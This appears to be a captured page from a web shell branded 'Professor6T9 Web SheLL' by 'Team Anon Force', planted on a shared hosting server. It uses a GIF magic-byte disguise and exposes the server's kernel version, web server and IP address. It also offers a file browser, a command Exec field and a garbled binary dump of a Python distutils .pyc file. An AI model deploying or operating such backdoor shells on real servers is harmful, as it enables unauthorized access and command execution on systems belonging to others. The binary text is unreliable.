GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
setuptools
/
_distutils
/
__pycache__
[ HOME ]
Exec
Submit
File Name : core.cpython-311.pyc
� � h�$ � � � d Z ddlmZ ddlZddlZddlZddlmZ ddlm Z ddl mZ ddlm Z dd lmZmZmZmZ dd lmZ g d�ZdZd � ZdadadZdZd� Zd� Zddd�ZdS )a# distutils.core The only module that needs to be imported to use the Distutils; provides the 'setup' function (which is to be called from the setup script). Also indirectly provides the Distribution and Command classes, although they are really defined in distutils.dist and distutils.cmd. � )�annotationsN)�Iterable� )�Command)�DEBUG)�Distribution)�CCompilerError�DistutilsArgError�DistutilsError�DistutilsSetupError)� Extension)r r r �setupz�usage: %(script)s [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...] or: %(script)s --help [cmd1 cmd2 ...] or: %(script)s --help-commands or: %(script)s cmd --help c �l � t j � | � � }t t � � z S )N)�os�path�basename�USAGE�locals)�script_name�scripts �Q/opt/cloudlinux/venv/lib64/python3.11/site-packages/setuptools/_distutils/core.py� gen_usager + s&